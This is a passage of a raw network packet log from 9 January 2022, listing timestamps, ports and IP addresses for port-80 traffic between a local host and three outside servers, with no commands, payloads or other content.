Jan 9, 2022 18:48:43.134855032 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.134897947 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.134915113 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.134943962 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.134983063 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.135024071 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.135039091 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.135071993 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.135112047 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.135129929 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.135159969 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.135169029 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.135211945 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.135257959 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.135265112 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.135302067 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.135343075 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.135360003 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.135387897 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.135427952 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.135468960 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.135488033 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.135513067 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.135555983 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.135572910 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.135607004 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.135608912 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.135651112 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.135688066 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.135730028 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.135745049 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.135773897 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.135816097 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.135832071 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.135868073 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.135874987 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.135909081 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.135963917 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.143997908 CET	80	49861	187.232.210.249	192.168.2.3
Jan 9, 2022 18:48:43.198210955 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.198276997 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.198321104 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.198364019 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.198385000 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.198405981 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.198415995 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.198457003 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.198494911 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.198540926 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.198551893 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.198585033 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.198628902 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.198641062 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.198683023 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.312447071 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.312505960 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.312549114 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.312592983 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.312649012 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.312653065 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.312679052 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.312696934 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.312742949 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.312756062 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.312788963 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.312834978 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.312840939 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.312910080 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.312956095 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.312963009 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.312999010 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.313043118 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.313050985 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.313085079 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.313128948 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.313138008 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.313174009 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.313219070 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.313229084 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.313261986 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.313306093 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.313314915 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.313354015 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.313399076 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.313402891 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.313442945 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.313486099 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.313494921 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.313532114 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.313574076 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.313585043 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.313618898 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.313662052 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.313671112 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.313705921 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.313751936 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.313756943 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.313796043 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.313841105 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.313847065 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.313884974 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.313927889 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.313935995 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.313972950 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.314018011 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.314023972 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.314060926 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.314105034 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.314112902 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.314146996 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.314202070 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.375164032 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.375226974 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.375268936 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.375303984 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.375319958 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.375365019 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.375380993 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.375410080 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.375452995 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.375468969 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.375499010 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.375555992 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.375925064 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.552495956 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.619076967 CET	80	49861	187.232.210.249	192.168.2.3
Jan 9, 2022 18:48:43.619127035 CET	80	49861	187.232.210.249	192.168.2.3
Jan 9, 2022 18:48:43.619247913 CET	49861	80	192.168.2.3	187.232.210.249
Jan 9, 2022 18:48:44.268011093 CET	49861	80	192.168.2.3	187.232.210.249
Jan 9, 2022 18:48:44.448551893 CET	80	49861	187.232.210.249	192.168.2.3
Jan 9, 2022 18:48:44.670357943 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:44.949629068 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:44.949815035 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:44.949873924 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:44.949886084 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:45.181773901 CET	49863	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:45.229588985 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:45.353508949 CET	80	49863	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:45.353673935 CET	49863	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:45.353729963 CET	49863	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:45.353739023 CET	49863	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:45.525413990 CET	80	49863	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:45.525469065 CET	80	49863	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:45.897263050 CET	80	49863	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:45.897314072 CET	80	49863	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:45.897412062 CET	49863	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:45.897594929 CET	49863	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:45.944235086 CET	49864	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:46.071561098 CET	80	49863	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:46.118372917 CET	80	49864	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:46.118566036 CET	49864	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:46.118674040 CET	49864	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:46.118771076 CET	49864	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:46.229041100 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:46.229075909 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:46.229149103 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:46.292676926 CET	80	49864	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:46.292701006 CET	80	49864	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:46.510409117 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:46.510446072 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:46.510504961 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:46.510533094 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:46.510606050 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:46.510660887 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:46.676958084 CET	80	49864	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:46.677011013 CET	80	49864	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:46.677124977 CET	49864	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:46.677203894 CET	49864	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:46.789395094 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:46.789450884 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:46.789520025 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:46.789526939 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:46.789571047 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:46.789623022 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:46.790092945 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:46.790188074 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:46.790242910 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:46.790256023 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:46.790383101 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:46.790436983 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:46.851306915 CET	80	49864	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:47.068533897 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.068620920 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.068653107 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.068684101 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.068752050 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.068880081 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.068917036 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.069042921 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.069062948 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.069104910 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.069206953 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.069297075 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.069338083 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.069453955 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.069498062 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.069574118 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.069664955 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.069725037 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.069761038 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.069900036 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.348718882 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.348746061 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.348895073 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.348939896 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.349042892 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.349106073 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.349144936 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.349303007 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.349347115 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.349385977 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.349409103 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.349510908 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.349526882 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.349621058 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.349693060 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.349780083 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.349880934 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.349936962 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.350052118 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.350069046 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.350157976 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.350235939 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.350275040 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.350341082 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.350433111 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.350531101 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.350594044 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.350678921 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.350734949 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.350796938 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.350895882 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.350984097 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.351046085 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.351066113 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.351206064 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.351228952 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.351264954 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.351376057 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.351437092 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.351553917 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.351623058 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.351689100 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.351777077 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.392836094 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.628791094 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.628860950 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.628956079 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.628981113 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.629000902 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.629060984 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.629087925 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.629240990 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.629272938 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.629312038 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.629477978 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.629520893 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.629540920 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.629612923 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.629671097 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.629775047 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.629836082 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.629908085 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.630047083 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.630085945 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.630146027 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.630249023 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.630287886 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.630340099 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.630424976 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.630492926 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.630625010 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.630709887 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.630773067 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.630822897 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.630826950 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.631180048 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.631213903 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.631243944 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.631247997 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.631299973 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.631314993 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.631388903 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.631438971 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.631567955 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.631592035 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.631654978 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.631759882 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.631819963 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.631875038 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.632004023 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.632083893 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.632139921 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.632266045 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.632392883 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.632435083 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.632447958 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.632544041 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.632597923 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.632778883 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.632813931 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.632879019 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.632914066 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.632977962 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.633028030 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.633130074 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.633205891 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.633260965 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.633368969 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.633479118 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.633529902 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.633536100 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.633558989 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.633610010 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.633728981 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.633841991 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.633898973 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.634054899 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.671731949 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.672187090 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.907852888 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.907907963 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.907948971 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.907974005 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.908024073 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.908071995 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.908937931 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.908984900 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.909024954 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.909061909 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.909094095 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.909101009 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.909137964 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.910439014 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.910485983 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.910522938 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.910557985 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.910562038 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.910597086 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.910602093 CET	80	49862	175.126.109.15	192.168.2.3
